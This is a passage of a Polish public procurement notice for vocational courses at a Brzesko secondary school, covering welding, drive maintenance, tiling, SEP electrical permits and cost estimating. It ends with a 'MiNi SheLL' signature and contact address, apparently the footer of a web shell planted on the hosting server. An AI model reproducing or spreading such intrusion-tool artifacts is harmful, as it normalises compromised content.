3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Celem kursu jest przygotowanie uczestników do egzaminu końcowego według wytycznych Instytutu Spawalnictwa. Program kursu powinien uwzględniać zróżnicowany poziom wiedzy i kwalifikacji  uczestników  oraz obejmować wiadomości  i umiejętności zgodne z wytycznymi Instytutu Spawalnictwa w Gliwicach.

5. Wykonawca zobowiązany jest zapewnić wszystkie elementy związane z realizacją zamówienia, to jest w szczególności: koszty badania lekarskiego wymaganego przy ubieganiu się o stosowne uprawnienia, materiały dydaktyczne dla kursantów i materiały eksploatacyjne do sprzętu dydaktycznego.

6. Zamawiający zapewnia: pracownię spawalniczą, laptop + rzutnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6:  Kurs spawacz dla uczniów grupy II ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 15 uczniów. 

2. Czas trwania zajęć wynosi:  150 godzin.

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Celem kursu jest przygotowanie uczestników do egzaminu końcowego według wytycznych Instytutu Spawalnictwa. Program kursu powinien uwzględniać zróżnicowany poziom wiedzy i kwalifikacji  uczestników  oraz obejmować wiadomości  i umiejętności zgodne z wytycznymi Instytutu Spawalnictwa w Gliwicach.

5. Wykonawca zobowiązany jest zapewnić wszystkie elementy związane z realizacją zamówienia, to jest w szczególności: koszty badania lekarskiego wymaganego przy ubieganiu się o stosowne uprawnienia, materiały dydaktyczne dla kursantów i materiały eksploatacyjne do sprzętu dydaktycznego, koszt jednokrotnego państwowego egzaminu spawacza dla każdego z uczestników kursu. 

6. Zamawiający zapewnia: pracownię spawalniczą, laptop + rzutnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Kurs konserwacja i obsługa napędów pneumatycznych i hydraulicznych dla uczniów  ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 15 uczniów 

2. Czas trwania kursu wynosi:  30 godzin

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00.

4. Kurs powinien uwzględniać między innymi: ogólną wiedzę na temat siłowników pneumatycznych i hydraulicznych stosowanych obecnie w przemyśle w tym ogólną wiedzę na temat fizycznych podstaw działania siłowników, sposoby uszczelnień i materiały z jakich są wykonywane oraz obszar zastosowania tego typu napędów. Cechy fizyczne płynów ich wady, zalety oraz wpływ na środowisko. Sposoby przygotowania i uzdatniania powietrza dla siłowników pneumatycznych. Elementy osprzętu i sterowania siłownikami. Symbole graficzne związane z napędem i sterowaniem hydraulicznym i pneumatycznym. Czytanie schematów. Sposoby lokalizacji i usuwania usterek napędów pneumatycznych i hydraulicznych. Zasady konserwacji systemów pneumatycznych i hydraulicznych, procedury kontroli i procedury dotyczące bezpieczeństwa funkcjonowania siłowników. Zasady bezpiecznej pracy z siłownikami. Materiał powinien być realizowany metodami aktywizującymi zarówno w części teoretycznej jak również w części laboratoryjnej. Część laboratoryjna powinna być nakierowana na zagadnienia symulacji różnego rodzaju nieprawidłowej pracy siłowników oraz sposobów ich lokalizacji i usuwania.

5. Zamawiający wymaga, aby Wykonawca zapewnił każdemu uczestnikowi zajęć materiały szkoleniowe, skrypty potrzebne do realizacji zajęć. 

6. Zamawiający zapewnia: Pracownia mechatroniki, stanowiska laboratoryjne napędów hydraulicznych i pneumatycznych, komputer + rzutnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8:  Kurs konserwacja i obsługa napędów elektrycznych dla uczniów  ZSP nr 2 
w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 15 uczniów 

2. Czas trwania kursu wynosi:  25 godzin

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Celem kursu jest zapoznanie uczestników z rodzajami maszyn elektrycznych, ich budową, zasadą działania oraz właściwościami ruchowymi. Podczas kursu uczestnicy zapoznają się z budową i zasadą działania oraz właściwościami wybranych maszyn elektrycznych. W części praktycznej zapoznają się z zasadami sterowania i właściwościami mechanicznymi maszyn, nauczą się wykonywać pomiary wielkości elektrycznych i mechanicznych prowadzące do określenia charakterystyk ruchowych. Nabędą także  umiejętności ich poprawnej eksploatacji i konserwacji.

5. Zamawiający wymaga, aby Wykonawca zapewnił każdemu uczestnikowi zajęć materiały szkoleniowe, skrypty potrzebne do realizacji zajęć. 

6. Zamawiający zapewnia: Pracownie elektryczną, 2 stanowiska laboratoryjne napędów elektrycznych, komputer + rzutnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9:  Kurs fliziarz (posadzkarz, glazurnik) dla uczniów grupy I w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 12 uczniów

2. Czas trwania zajęć wynosi: 110 godz. w tym 30 godzin zajęć teoretycznych oraz 80 godzin zajęć praktycznych. 

3. Kurs powinien zostać zorganizowany w czasie wolnym od nauki w dni powszednie w godzinach 15:00 - 19:00 oraz w soboty w godzinach 8:00 - 18:00 z uwzględnieniem konieczności dojazdu uczniów do miejsca realizacji kursu.

4. Kurs powinien zawierać między innymi następujące zagadnienia: zasady bhp i ppoż. przy robotach posadzkarskich, stosowanie dokumentacji budowlanej, ogólna charakterystyka posadzek, materiały, narzędzia i sprzęt do posadzek z płytek, wykonanie i przygotowanie podkładu wraz z izolacją, wykonanie posadzek z płytek, wykańczanie i konserwacja posadzki, wykonanie i przygotowanie podłoża wraz z izolacją, materiały, narzędzia i sprzęt do posadzek z wykładzin tekstylnych i z tworzyw sztucznych, wykonanie posadzki z tworzyw sztucznych, wykonanie posadzek z wykładzin tekstylnych, wykańczanie i konserwacja posadzek, przygotowanie podłoży, materiały, narzędzia i sprzęt do glazury, wykonanie okładzin z płytek ceramicznych, montaż elementów wykończeniowych i ozdobnych, spoinowanie.

5. Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom kursu niezbędne materiały szkoleniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10:  Kurs fliziarz (posadzkarz, glazurnik) dla uczniów grupy II w  ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 12 uczniów 

2. Czas trwania zajęć wynosi: 110 godz. w tym 30 godzin zajęć teoretycznych oraz 80 godzin zajęć praktycznych. 

3. Kurs powinien zostać zorganizowany w czasie wolnym od nauki w dni powszednie w godzinach 15:00 - 19:00 oraz w soboty w godzinach 8:00 - 18:00 z uwzględnieniem konieczności dojazdu uczniów do miejsca realizacji kursu.

4. Kurs powinien zawierać między innymi następujące zagadnienia: zasady bhp i ppoż. przy robotach posadzkarskich, stosowanie dokumentacji budowlanej, ogólna charakterystyka posadzek, materiały, narzędzia i sprzęt do posadzek z płytek, wykonanie i przygotowanie podkładu wraz z izolacją, wykonanie posadzek z płytek, wykańczanie i konserwacja posadzki, wykonanie i przygotowanie podłoża wraz z izolacją, materiały, narzędzia i sprzęt do posadzek z wykładzin tekstylnych i z tworzyw sztucznych, wykonanie posadzki z tworzyw sztucznych, wykonanie posadzek z wykładzin tekstylnych, wykańczanie i konserwacja posadzek, przygotowanie podłoży, materiały, narzędzia i sprzęt do glazury, wykonanie okładzin z płytek ceramicznych, montaż elementów wykończeniowych i ozdobnych, spoinowanie.

5. Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom kursu niezbędne materiały szkoleniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11:  Kurs na uprawnienia SEP do 1 kV dla ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 40 uczniów w podziale na trzy grupy po 2x15 uczniów i 1x10 uczniów). 

2. Czas trwania kursu dla każdej grupy wynosi 30 godz. 

3. Zamawiający wymaga aby kurs został przeprowadzony na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej - ferie zimowe. Szczegółowy harmonogram zostanie ustalony przed podpisaniem umowy z Wykonawcą. 

4. Kurs obejmować będzie szkolenie przygotowawcze do egzaminu kwalifikacyjnego w zakresie eksploatacji urządzeń, instalacji i sieci energetycznych o napięciu nie przekraczającym 1kV (kat. E).

5. Celem szkolenia ma być umożliwienie zdobycia uprawnień SEP.

6. Wykonawca zapewni uczestnikom niezbędne pomoce i materiały szkoleniowe.

7. Wykonawca na zakończenie kursu zorganizuje na swój koszt egzamin państwowy przed komisją SEP. Po złożeniu egzaminu uczestnicy otrzymają dokument potwierdzający zdobycie uprawnień SEP do 1kV. 

8.  Zamawiający zapewnia: salę lekcyjną, 1 x rzutnik, 1x wizualizer..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12:  Kurs Kosztorysowania dla uczniów grupy I ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników kursu - 10 uczniów.

2. Czas trwania zajęć wynosi: 60 godz. 

3. Kurs powinien zostać zorganizowany w czasie wolnym od nauki w dni powszednie w godzinach 15:00 - 19:00 oraz w soboty w godzinach 8:00 - 18:00

4. Celem kursu jest uzupełnienie i poszerzenie wiedzy dotyczącej kosztorysowania ze szczególnym uwzględnieniem ćwiczeń praktycznych z przedmiarowania robót budowlanych. Zajęcia prowadzone powinny być w formie ćwiczeń metodami aktywizującymi na stanowiskach komputerowych z zainstalowanym niezbędnym oprogramowaniem zapewniającym realizację celów kursu.

5. Zamawiający wymaga, aby Wykonawca zapewnił każdemu uczestnikowi zajęć materiały szkoleniowe, skrypty potrzebne do realizacji zajęć. 

6. Zamawiający zapewnia sale przeprowadzenie kursu oraz 10 stanowisk komputerowych wyposażonych w program do kosztorysowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13:  Kurs Kosztorysowania dla uczniów grupy II ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Liczba uczestników kursu - 10 uczniów.

2.  Czas trwania zajęć wynosi: 60 godz. 

3. Kurs powinien zostać zorganizowany w czasie wolnym od nauki w dni powszednie w godzinach 15:00 - 19:00 oraz w soboty w godzinach 8:00 - 18:00.

4. Celem kursu jest uzupełnienie i poszerzenie wiedzy dotyczącej kosztorysowania ze szczególnym uwzględnieniem ćwiczeń praktycznych z przedmiarowania robót budowlanych. Zajęcia prowadzone powinny być w formie ćwiczeń metodami aktywizującymi na stanowiskach komputerowych z zainstalowanym niezbędnym oprogramowaniem zapewniającym realizację celów kursu.

5. Zamawiający wymaga, aby Wykonawca zapewnił każdemu uczestnikowi zajęć materiały szkoleniowe, skrypty potrzebne do realizacji zajęć. 

6. Zamawiający zapewnia sale przeprowadzenie kursu oraz 10 stanowisk komputerowych wyposażonych w program do kosztorysowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com